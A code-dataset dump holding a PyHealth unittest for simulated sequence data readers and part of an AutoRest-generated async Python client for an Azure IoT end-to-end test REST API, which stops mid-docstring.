hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | 
qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
6f613e57d2041c089c6d8b96ec4cac3ee4b9ae3d | 8,373 | py | Python | pyhealth/test/test_datareader.py | rkalahasty/PyHealth | 1ee0859d8d39a7fc6f8df48ef8d2bf6c17dcf4a5 | [
"BSD-2-Clause"
] | 485 | 2020-08-03T20:04:21.000Z | 2022-02-25T13:35:43.000Z | pyhealth/test/test_datareader.py | rkalahasty/PyHealth | 1ee0859d8d39a7fc6f8df48ef8d2bf6c17dcf4a5 | [
"BSD-2-Clause"
] | 6 | 2020-08-06T01:07:45.000Z | 2021-10-15T21:49:42.000Z | pyhealth/test/test_datareader.py | rkalahasty/PyHealth | 1ee0859d8d39a7fc6f8df48ef8d2bf6c17dcf4a5 | [
"BSD-2-Clause"
] | 98 | 2020-08-04T01:04:38.000Z | 2022-02-09T10:36:03.000Z | # -*- coding: utf-8 -*-
from __future__ import division
from __future__ import print_function
import os
import sys
import unittest
import numpy as np
import torch
import zipfile
import shutil
from pyhealth.data.simulation_data import generate_simulation_sequence_data
from pyhealth.data.simulation_data import generate_simulation_image_data
from pyhealth.data.simulation_data import generate_simulation_ecg_data
from pyhealth.data.data_reader.sequence import dl_reader as seq_dl_reader
from pyhealth.data.data_reader.sequence import ml_reader as seq_ml_reader
from pyhealth.data.data_reader.image import dl_reader as image_dl_reader
from pyhealth.data.data_reader.ecg import dl_reader as ecg_dl_reader
from pyhealth.data.data_reader.ecg import ml_reader as ecg_ml_reader
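# A quick way to run this module directly (a minimal sketch, assuming the
# pyhealth package is importable from the current environment):
#
#   python -m unittest pyhealth.test.test_datareader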
class TestDatareader(unittest.TestCase):
def test_seq_ml_reader(self):
test_n_sample = 10
test_batch_size = 2
test_n_feat = 30
test_sub_group = 3
data = generate_simulation_sequence_data(n_sample = test_n_sample,
n_feat = test_n_feat,
task = 'binaryclass')()
seq_ds = seq_ml_reader.DatasetReader(data,
sub_group = test_sub_group,
data_type = 'aggregation',
task_type = 'binaryclass').get_data()
assert np.shape(seq_ds['X'])[0] == test_n_sample
assert np.shape(seq_ds['X'])[1] == test_n_feat * test_sub_group
assert np.shape(seq_ds['Y'])[0] == test_n_sample
assert np.shape(seq_ds['Y'])[1] == 1
test_n_sample = 10
test_batch_size = 2
test_n_feat = 30
test_sub_group = 3
test_n_class = 3
data = generate_simulation_sequence_data(n_sample = test_n_sample,
n_feat = test_n_feat,
task = 'multiclass',
n_class = test_n_class)()
seq_ds = seq_ml_reader.DatasetReader(data,
sub_group = test_sub_group,
data_type = 'aggregation',
task_type = 'multiclass').get_data()
assert np.shape(seq_ds['X'])[0] == test_n_sample
assert np.shape(seq_ds['X'])[1] == test_n_feat * test_sub_group
assert np.shape(seq_ds['Y'])[0] == test_n_sample
assert np.shape(seq_ds['Y'])[1] == 1
test_n_sample = 10
test_batch_size = 2
test_n_feat = 30
test_sub_group = 3
test_n_class = 3
data = generate_simulation_sequence_data(n_sample = test_n_sample,
n_feat = test_n_feat,
task = 'multilabel',
n_class = test_n_class)()
seq_ds = seq_ml_reader.DatasetReader(data,
sub_group = test_sub_group,
data_type = 'aggregation',
task_type = 'multilabel').get_data()
assert np.shape(seq_ds['X'])[0] == test_n_sample
assert np.shape(seq_ds['X'])[1] == test_n_feat * test_sub_group
assert np.shape(seq_ds['Y'])[0] == test_n_sample
assert np.shape(seq_ds['Y'])[1] == test_n_class
def test_seq_dl_reader(self):
test_batch_size = 2
test_n_feat = 30
data = generate_simulation_sequence_data(n_sample = 10,
n_feat = test_n_feat,
task = 'binaryclass',
n_class = 2)()
        seq_ds = seq_dl_reader.DatasetReader(data, data_type = 'aggregation')
seq_loader = torch.utils.data.DataLoader(seq_ds, batch_size=test_batch_size)
for batch_idx, databatch in enumerate(seq_loader):
assert databatch['X'].size()[0] == test_batch_size
assert databatch['X'].size()[2] == test_n_feat
assert databatch['M'].size()[0] == test_batch_size
assert databatch['cur_M'].size()[0] == test_batch_size
assert databatch['Y'].size()[0] == test_batch_size
assert len(databatch['Y'].size()) == 1
assert databatch['T'].size()[0] == test_batch_size
assert databatch['X'].size()[1] == databatch['M'].size()[1]
assert databatch['X'].size()[1] == databatch['cur_M'].size()[1]
assert databatch['X'].size()[1] == databatch['T'].size()[1]
test_n_class = 3
data = generate_simulation_sequence_data(n_sample = 10,
n_feat = test_n_feat,
task = 'multiclass',
n_class = test_n_class)()
        seq_ds = seq_dl_reader.DatasetReader(data, data_type = 'aggregation')
seq_loader = torch.utils.data.DataLoader(seq_ds, batch_size=test_batch_size)
for batch_idx, databatch in enumerate(seq_loader):
assert databatch['X'].size()[0] == test_batch_size
assert databatch['X'].size()[2] == test_n_feat
assert databatch['M'].size()[0] == test_batch_size
assert databatch['cur_M'].size()[0] == test_batch_size
assert databatch['Y'].size()[0] == test_batch_size
assert databatch['Y'].size()[1] == test_n_class
assert databatch['T'].size()[0] == test_batch_size
assert databatch['X'].size()[1] == databatch['M'].size()[1]
assert databatch['X'].size()[1] == databatch['cur_M'].size()[1]
assert databatch['X'].size()[1] == databatch['T'].size()[1]
test_n_class = 3
data = generate_simulation_sequence_data(n_sample = 10,
n_feat = test_n_feat,
task = 'multilabel',
n_class = test_n_class)()
        seq_ds = seq_dl_reader.DatasetReader(data, data_type = 'aggregation')
seq_loader = torch.utils.data.DataLoader(seq_ds, batch_size=test_batch_size)
for batch_idx, databatch in enumerate(seq_loader):
assert databatch['X'].size()[0] == test_batch_size
assert databatch['X'].size()[2] == test_n_feat
assert databatch['M'].size()[0] == test_batch_size
assert databatch['cur_M'].size()[0] == test_batch_size
assert databatch['Y'].size()[0] == test_batch_size
assert databatch['Y'].size()[1] == test_n_class
assert databatch['T'].size()[0] == test_batch_size
assert databatch['X'].size()[1] == databatch['M'].size()[1]
assert databatch['X'].size()[1] == databatch['cur_M'].size()[1]
assert databatch['X'].size()[1] == databatch['T'].size()[1]
test_batch_size = 2
test_n_feat = 30
data = generate_simulation_sequence_data(n_sample = 10,
n_feat = test_n_feat,
task = 'regression',
n_class = 2)()
        seq_ds = seq_dl_reader.DatasetReader(data, data_type = 'aggregation')
seq_loader = torch.utils.data.DataLoader(seq_ds, batch_size=test_batch_size)
for batch_idx, databatch in enumerate(seq_loader):
assert databatch['X'].size()[0] == test_batch_size
assert databatch['X'].size()[2] == test_n_feat
assert databatch['M'].size()[0] == test_batch_size
assert databatch['cur_M'].size()[0] == test_batch_size
assert databatch['Y'].size()[0] == test_batch_size
assert len(databatch['Y'].size()) == 1
assert databatch['T'].size()[0] == test_batch_size
assert databatch['X'].size()[1] == databatch['M'].size()[1]
assert databatch['X'].size()[1] == databatch['cur_M'].size()[1]
assert databatch['X'].size()[1] == databatch['T'].size()[1]
| 52.33125 | 84 | 0.541144 | 1,001 | 8,373 | 4.201798 | 0.073926 | 0.049929 | 0.089634 | 0.095102 | 0.90894 | 0.90894 | 0.901331 | 0.875178 | 0.86234 | 0.814313 | 0 | 0.019087 | 0.343007 | 8,373 | 159 | 85 | 52.660377 | 0.745501 | 0.002508 | 0 | 0.811189 | 0 | 0 | 0.033054 | 0 | 0 | 0 | 0 | 0 | 0.363636 | 1 | 0.013986 | false | 0 | 0.118881 | 0 | 0.13986 | 0.006993 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6f696815f75c629bee5fa5efeabfc821330d60c7 | 48,343 | py | Python | test-runner/adapters/rest/generated/e2erestapi/aio/operations_async/_device_operations_async.py | brycewang-microsoft/iot-sdks-e2e-fx | 211c9c2615a82076bda02a27152d67366755edbf | [
"MIT"
] | null | null | null | test-runner/adapters/rest/generated/e2erestapi/aio/operations_async/_device_operations_async.py | brycewang-microsoft/iot-sdks-e2e-fx | 211c9c2615a82076bda02a27152d67366755edbf | [
"MIT"
] | null | null | null | test-runner/adapters/rest/generated/e2erestapi/aio/operations_async/_device_operations_async.py | brycewang-microsoft/iot-sdks-e2e-fx | 211c9c2615a82076bda02a27152d67366755edbf | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from msrest.exceptions import HttpOperationError
from ... import models
class DeviceOperations:
"""DeviceOperations async operations.
    You should not instantiate this class directly; instead, create a Client instance, which will create it for you and attach it as an attribute.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.config = config
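    # Illustrative usage sketch (hedged: the top-level client class name and
    # its `device` attribute are assumptions based on how AutoRest typically
    # attaches operations classes, not confirmed by this file):
    #
    #   client = AzureIOTEndToEndTestApiAsync(base_url="http://localhost:8080")
    #   result = await client.device.connect("mqtt", connection_string)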
async def connect(
self, transport_type, connection_string, ca_certificate=None, *, custom_headers=None, raw=False, **operation_config):
"""Connect to the azure IoT Hub as a device.
:param transport_type: Transport to use. Possible values include:
'amqp', 'amqpws', 'mqtt', 'mqttws', 'http'
:type transport_type: str
:param connection_string: connection string
:type connection_string: str
:param ca_certificate:
:type ca_certificate: ~e2erestapi.models.Certificate
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: ConnectResponse or ClientRawResponse if raw=true
:rtype: ~e2erestapi.models.ConnectResponse or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.connect.metadata['url']
path_format_arguments = {
'transportType': self._serialize.url("transport_type", transport_type, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['connectionString'] = self._serialize.query("connection_string", connection_string, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
if ca_certificate is not None:
body_content = self._serialize.body(ca_certificate, 'Certificate')
else:
body_content = None
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ConnectResponse', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
connect.metadata = {'url': '/device/connect/{transportType}'}
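    # Hedged sketch of the `raw=True` pattern the docstrings describe
    # (msrest's ClientRawResponse exposes the deserialized body as `output`
    # and the HTTP response as `response`; `client` is the hypothetical
    # top-level client from the sketch above):
    #
    #   raw_result = await client.device.connect("mqtt", connection_string, raw=True)
    #   connect_response = raw_result.output
    #   http_response = raw_result.response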
async def disconnect(
self, connection_id, *, custom_headers=None, raw=False, **operation_config):
"""Disconnect the device.
:param connection_id: Id for the connection
:type connection_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.disconnect.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
disconnect.metadata = {'url': '/device/{connectionId}/disconnect'}
async def create_from_connection_string(
self, transport_type, connection_string, ca_certificate=None, *, custom_headers=None, raw=False, **operation_config):
"""Create a device client from a connection string.
:param transport_type: Transport to use. Possible values include:
'amqp', 'amqpws', 'mqtt', 'mqttws', 'http'
:type transport_type: str
:param connection_string: connection string
:type connection_string: str
:param ca_certificate:
:type ca_certificate: ~e2erestapi.models.Certificate
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: ConnectResponse or ClientRawResponse if raw=true
:rtype: ~e2erestapi.models.ConnectResponse or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.create_from_connection_string.metadata['url']
path_format_arguments = {
'transportType': self._serialize.url("transport_type", transport_type, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['connectionString'] = self._serialize.query("connection_string", connection_string, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
if ca_certificate is not None:
body_content = self._serialize.body(ca_certificate, 'Certificate')
else:
body_content = None
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ConnectResponse', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create_from_connection_string.metadata = {'url': '/device/createFromConnectionString/{transportType}'}
async def create_from_x509(
self, transport_type, x509, *, custom_headers=None, raw=False, **operation_config):
"""Create a device client from X509 credentials.
:param transport_type: Transport to use. Possible values include:
'amqp', 'amqpws', 'mqtt', 'mqttws', 'http'
:type transport_type: str
:param x509:
:type x509: object
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: ConnectResponse or ClientRawResponse if raw=true
:rtype: ~e2erestapi.models.ConnectResponse or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.create_from_x509.metadata['url']
path_format_arguments = {
'transportType': self._serialize.url("transport_type", transport_type, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(x509, 'object')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ConnectResponse', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create_from_x509.metadata = {'url': '/device/createFromX509/{transportType}'}
async def create_from_symmetric_key(
self, transport_type, device_id, hostname, symmetric_key, *, custom_headers=None, raw=False, **operation_config):
"""Create a device client from a symmetric key.
:param transport_type: Transport to use. Possible values include:
'amqp', 'amqpws', 'mqtt', 'mqttws', 'http'
:type transport_type: str
:param device_id:
:type device_id: str
:param hostname: name of the host to connect to
:type hostname: str
:param symmetric_key: key to use for connection
:type symmetric_key: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: ConnectResponse or ClientRawResponse if raw=true
:rtype: ~e2erestapi.models.ConnectResponse or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.create_from_symmetric_key.metadata['url']
path_format_arguments = {
'transportType': self._serialize.url("transport_type", transport_type, 'str'),
'deviceId': self._serialize.url("device_id", device_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['hostname'] = self._serialize.query("hostname", hostname, 'str')
query_parameters['symmetricKey'] = self._serialize.query("symmetric_key", symmetric_key, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ConnectResponse', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create_from_symmetric_key.metadata = {'url': '/device/createFromSymmetricKey/{deviceId}/{transportType}'}
async def connect2(
self, connection_id, *, custom_headers=None, raw=False, **operation_config):
"""Connect the device.
:param connection_id: Id for the connection
:type connection_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.connect2.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
connect2.metadata = {'url': '/device/{connectionId}/connect2'}
async def reconnect(
self, connection_id, force_renew_password=None, *, custom_headers=None, raw=False, **operation_config):
"""Reconnect the device.
:param connection_id: Id for the connection
:type connection_id: str
:param force_renew_password: True to force SAS renewal
:type force_renew_password: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.reconnect.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if force_renew_password is not None:
query_parameters['forceRenewPassword'] = self._serialize.query("force_renew_password", force_renew_password, 'bool')
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
reconnect.metadata = {'url': '/device/{connectionId}/reconnect'}
async def disconnect2(
self, connection_id, *, custom_headers=None, raw=False, **operation_config):
"""Disconnect the device.
:param connection_id: Id for the connection
:type connection_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.disconnect2.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
disconnect2.metadata = {'url': '/device/{connectionId}/disconnect2'}
async def destroy(
self, connection_id, *, custom_headers=None, raw=False, **operation_config):
"""Disconnect and destroy the device client.
:param connection_id: Id for the connection
:type connection_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.destroy.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
destroy.metadata = {'url': '/device/{connectionId}/destroy'}
async def enable_methods(
self, connection_id, *, custom_headers=None, raw=False, **operation_config):
"""Enable methods.
:param connection_id: Id for the connection
:type connection_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.enable_methods.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
enable_methods.metadata = {'url': '/device/{connectionId}/enableMethods'}
async def wait_for_method_and_return_response(
self, connection_id, method_name, request_and_response, *, custom_headers=None, raw=False, **operation_config):
"""Wait for a method call, verify the request, and return the response.
This is a workaround to deal with SDKs that only have method call
operations that are sync. This function responds to the method with
the payload of this function, and then returns the method parameters.
        Real-world implementations would never do this, but this is the only
        sane way to write our test code right now (because the method handlers
for C, Java, and probably Python all return the method response instead
of supporting an async method call).
:param connection_id: Id for the connection
:type connection_id: str
:param method_name: name of the method to handle
:type method_name: str
:param request_and_response:
:type request_and_response:
~e2erestapi.models.MethodRequestAndResponse
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.wait_for_method_and_return_response.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str'),
'methodName': self._serialize.url("method_name", method_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(request_and_response, 'MethodRequestAndResponse')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
wait_for_method_and_return_response.metadata = {'url': '/device/{connectionId}/waitForMethodAndReturnResponse/{methodName}'}
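    # Hedged call sketch for the workaround described above (the
    # MethodRequestAndResponse field names below are assumptions, not
    # confirmed by this file):
    #
    #   req = models.MethodRequestAndResponse(
    #       request_payload={"k": "v"}, response_payload={"ok": True},
    #       status_code=200)
    #   await client.device.wait_for_method_and_return_response(
    #       connection_id, "testMethod", req)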
async def enable_c2d_messages(
self, connection_id, *, custom_headers=None, raw=False, **operation_config):
"""Enable c2d messages.
:param connection_id: Id for the connection
:type connection_id: str
